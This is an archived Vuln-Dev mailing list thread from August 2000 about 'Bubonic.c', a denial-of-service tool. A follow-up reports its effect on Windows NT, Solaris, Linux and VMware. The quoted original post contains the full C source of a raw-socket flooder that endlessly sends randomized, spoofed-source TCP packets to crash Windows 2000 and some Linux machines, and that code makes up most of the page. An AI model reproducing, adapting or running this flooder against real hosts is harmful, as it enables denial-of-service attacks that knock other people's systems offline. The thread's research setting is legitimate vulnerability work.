Vulnerability Development mailing list archives
Re: Win2k & Linux DoS
From: Wolfgang Gassner <wulfmen () HOTMAIL COM>
Date: Mon, 28 Aug 2000 10:08:09 GMT
I played around a little with Bubonic.c and
realized the following:
Winnt 4.0 SP6: CPU Load at 60 %, nothing more, but tested on LAN and
not over the Net!
Solaris 7.0 on Ultra: CPU Load on around 40,nothing more, but tested
on LAN and not over the Net!
Linux(Suse6.2,6.4) No problem at all!
VMWARE 1.0 b.194(Suse6.2 on NT) BINGO !! CPU Load 100%,
VMWARE not working until ending flooding!
My tests were all done over Lan!
cu
From: "J. Oquendo" <intrusion () ENGINEER COM>
Reply-To: "J. Oquendo" <intrusion () ENGINEER COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Win2k & Linux DoS
Date: Fri, 25 Aug 2000 11:50:24 -0400
MIME-Version: 1.0
X-Originating-IP: 63.144.153.254
Received: from [207.126.127.68] by hotmail.com (3.2) with ESMTP id
MHotMailBB702EF20072D82197B9CF7E7F449C280; Fri Aug 25 14:25:22 2000
Received: from lists.securityfocus.com (lists.securityfocus.com
[207.126.127.68])by lists.securityfocus.com (Postfix) with ESMTPid
8E3161F72C; Fri, 25 Aug 2000 10:22:24 -0700 (PDT)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
(LISTSERV-TCP/IP release 1.8d) with spool id 12219647 for
VULN-DEV () LISTS SECURITYFOCUS COM; Fri, 25 Aug 2000 10:22:10 -0700
Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78])
by lists.securityfocus.com (Postfix) with SMTP id DFE7D1EEB9 for
<vuln-dev () lists securityfocus com>; Fri, 25 Aug 2000 08:51:45 -0700
(PDT)
Received: (qmail 11891 invoked by alias); 25 Aug 2000 15:52:50 -0000
Received: (qmail 11886 invoked from network); 25 Aug 2000 15:52:50 -0000
Received: from rmx441-mta.mail.com (165.251.48.44) by
mail.securityfocus.com with SMTP; 25 Aug 2000 15:52:50 -0000
Received: from web303-mc.mail.com (web303-mc.mail.com [165.251.48.164]) by
rmx441-mta.mail.com (8.9.3/8.9.3) with SMTP id LAA01904; Fri, 25
Aug 2000 11:50:30 -0400 (EDT)
From owner-vuln-dev () SECURITYFOCUS COM Fri Aug 25 14:27:43 2000
Approved-By: BlueBoar () THIEVCO COM
Delivered-To: vuln-dev () lists securityfocus com
Delivered-To: vuln-dev () securityfocus com
X-Mailer: mail.com
Message-ID: <383928042.967218630176.JavaMail.root () web303-mc mail com>
Sender: VULN-DEV List <VULN-DEV () SECURITYFOCUS COM>
X-To: bugtraq () securityfocus com
Greetings everyone. While tampering with random codes when building a
theoretical tool I managed to crash my Windows2000 laptop by randomizing
TCP settings. At first it wasn't a big deal since MS has gotten me used to
seeing error codes with dumps for just about anything.
Seems this code which was in no way specified to attack any specific OS
brings the load up to extreme levels and is not limited to Win2K either.
Written on an Ultra5 running Linux (zoot) I managed to drive this load up
high after about 3 minutes forcing the machine to lag drastically.
So in essence I give to you Bubonic.c maybe someone else can benchmark it
and figure out whats going on.
Error code received during thw WinCrash was:
STOP 0x00000041
(0x00001000,0x00001279,0x0000042a,0x00000001)
MUST_SUCCEED_POOL_EMPTY
-------- SNIP TO CODE --------
/*
* Bubonic.c lame DoS against Windows 2000 machines
* and certain versions of Linux (worked against an Ultra5
* running Redhat Zoot. Should compile under anything.
* Randomly sends TCP packets with random settings, etc.
* Brings the load up causing the box to crash with
* error code:
* STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
* MUST_SUCCEED_POOL_EMPTY
* CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
* WEE MULTICODE... www.antioffline.com/daemonic.c
* shouts... hrmm fsck it why not...
* #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
* qwer7y, m3th, god-, tattooman, spikeman, and my wife.
* Can't forget security staff all over the place.
* Logs for the packets sent at www.antioffline.com/logged
* Windows2K screen shots at www.antioffline.com/loads.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int ip_hl:4,
ip_v:4;
u_char ip_tos;
u_short ip_len;
u_short ip_id;
u_short ip_off;
u_char ip_ttl;
u_char ip_p;
u_short ip_sum;
u_long saddr, daddr;
};
struct tcp_hdr {
u_short th_sport;
u_short th_dport;
u_long th_seq;
u_long th_syn;
u_int th_x2:4,
th_off:4;
u_char th_flags;
u_short th_win;
u_short th_sum;
u_short th_urp;
};
struct tcpopt_hdr {
u_char type;
u_char len;
u_short value;
};
struct pseudo_hdr {
u_long saddr, daddr;
u_char mbz, ptcl;
u_short tcpl;
};
struct packet {
struct ip/*_hdr*/ ip;
struct tcphdr tcp;
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;
void usage(char *progname)
{
fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
fprintf(stderr, "Ports are set to send and receive on port 179\n");
fprintf(stderr, "dst:\tDestination Address\n");
fprintf(stderr, "src:\tSource Address\n");
fprintf(stderr, "size:\tSize of packet which should be no larger than
1024 should allow for xtra header info thru routes\n");
fprintf(stderr, "num:\tpackets\n\n");
exit(1);
}
inline u_short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
u_long lookup(char *hostname)
{
struct hostent *hp;
if ((hp = gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
void flooder(void)
{
struct timespec ts;
int i;
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 10;
packet.ip.ip_hl = 5;
packet.ip.ip_v = 4;
packet.ip.ip_p = IPPROTO_TCP;
packet.ip.ip_tos = rand();
packet.ip.ip_id = radd;
packet.ip.ip_len = FIX(sizeof(packet));
packet.ip.ip_off = 0;
packet.ip.ip_ttl = 255;
packet.ip.ip_dst.s_addr = radd;
packet.tcp.th_flags = random();
packet.tcp.th_win = 65535;
packet.tcp.th_seq = random();
packet.tcp.th_ack = 0;
packet.tcp.th_off = 0;
packet.tcp.th_urp = random();
packet.tcp.th_dport = random();
cksum.pseudo.daddr = sradd;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = random();
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = sradd;
s_in.sin_port = packet.tcp.th_dport;
for(i=0;;++i) {
if( !(i&0x3FF) ) {
packet.tcp.th_sport = rand();
cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
packet.tcp.th_flags = random();
packet.tcp.th_ack = rand();
}
else {
packet.tcp.th_flags = rand();
packet.tcp.th_ack = rand();
}
++packet.ip.ip_id;
/*++packet.tcp.th_sport*/;
++packet.tcp.th_seq;
if (!bgport)
s_in.sin_port = packet.tcp.th_dport = rand();
packet.ip.ip_sum = 0;
packet.tcp.th_sum = 0;
cksum.tcp = packet.tcp;
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0);
}
}
int main(int argc, char *argv[])
{
int on = 1;
printf("Bubonic -- sil () antioffline com\n\n");
if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (argc < 4)
usage(argv[0]);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))
< 0)
{
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
printf("\nFinding host\n"); fflush(stdout);
radd = lookup(argv[1]);
bgport = atoi(argv[3]);
bgsize = atoi(argv[4]);
sradd = lookup(argv[2]);
printf("AntiOffline -- Putting the Hero in Heroin\n");
flooder();
return 0;
}
______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup
<< bubonic.c >>
_________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com.
Current thread:
- Win2k & Linux DoS J. Oquendo (Aug 25)
- <Possible follow-ups>
- Re: Win2k & Linux DoS J. Oquendo (Aug 25)
- Re: Win2k & Linux DoS Vitaly McLain (Aug 26)
- Re: Win2k & Linux DoS Wolfgang Gassner (Aug 28)